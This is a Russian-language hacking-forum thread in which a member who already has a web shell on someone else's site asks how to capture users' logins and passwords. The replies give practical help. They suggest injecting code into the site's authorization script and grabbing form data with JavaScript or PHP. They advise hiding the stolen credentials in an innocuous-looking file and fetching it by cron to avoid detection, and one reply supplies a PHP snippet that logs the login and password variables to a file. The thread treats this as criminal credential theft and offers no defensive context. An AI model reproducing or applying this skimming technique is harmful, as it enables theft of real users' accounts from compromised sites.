HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
Перезагрузить страницу установка сниффера
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 27.03.2015, 13:19
reuvenmatbil
Новичок
Регистрация: 01.09.2012
Сообщений: 28
С нами: 7208246

Репутация: 0
По умолчанию
имею шелл на сайте.

необходимо перехватывать логин и пароли юзеров чтоб они шли на впс

в какую сторону начинать копать чтобы реализовать задумку?
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 09.04.2015, 01:17
KIR@PRO
Постоянный
Регистрация: 26.12.2007
Сообщений: 353
С нами: 9671366

Репутация: 332
По умолчанию
инжект в скрипт авторизации, если есть соответствующие права на файл...
 
Ответить с цитированием

  #3  
Старый 10.05.2015, 05:12
qweqwe
Новичок
Регистрация: 18.12.2007
Сообщений: 0
С нами: 9682966

Репутация: 0
По умолчанию
так же интересует данный вопрос. Может кто то пример показать. Имеется шелл, идет ввод гифт кода, напишите примерный код, для того, чтобы введеные данные уходили ко мне на ВПС.

Так же прошу помощи по php, какие функции поизучать, чтобы ствить подобого рода снифера?

(чтобы ореентироватся в коде, какие параметры смотреть, как смотреть, что передается какой командой и тд. ) Спс заранее за помощь и ответы
 
Ответить с цитированием

  #4  
Старый 10.05.2015, 15:04
blaga
Постоянный
Регистрация: 23.03.2006
Сообщений: 977
С нами: 10597286

Репутация: 694


По умолчанию
можно использовать два метода. первый - это просто грабим данные из форм посредством javaScript и ajax

второй - грабим переменные из php и их уже коипруем\отправляем на сервак.

кстати я бы не стал слать данные на свой серв, т.к. при обнаружении сниффера ваш серв спалят сразу же.

лучше данные писать в неприметный файл, например картинку и потом с сервера по крону скачивать эту картинку.
 
Ответить с цитированием

  #5  
Старый 10.05.2015, 19:04
Black Diver
Новичок
Регистрация: 20.03.2009
Сообщений: 28
С нами: 9023102

Репутация: 0
По умолчанию
Например можно писать все переменные логина в файл и расположить его в удобном неприметном месте для скачивания.

Для этого в скрипт авторизации (после получения переменных с логином/паролем) вставляем код в стиле (код писался на коленке):

PHP код:
[COLOR="#000000"][COLOR="#0000BB"]$f[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]fopen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'counter.txt'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'a'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]fwrite[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$f[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$login_var[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'\n'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]fwrite[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$f[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$pass_var[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'\n'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]fclose[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$f[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR
где counter.txt это имя файла, $login_var и $pass_var - переменные из оригинального скрипта с логином и паролем а \n - перевод строки
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.